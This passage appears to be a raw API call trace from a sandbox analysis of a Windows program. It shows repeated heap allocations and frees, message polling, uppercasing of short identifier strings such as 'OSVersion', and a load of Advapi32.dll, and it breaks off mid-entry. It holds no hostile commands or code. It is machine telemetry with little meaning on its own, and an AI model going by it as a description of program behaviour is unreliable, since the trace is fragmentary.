HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.185] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.185] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.185] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0266.185] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.186] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.186] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.186] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.187] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0266.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.189] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.190] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.190] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.191] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0266.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.192] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0266.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.193] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.193] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.194] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.195] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0266.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.196] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.198] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0266.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0266.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0266.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0266.202] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0266.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: 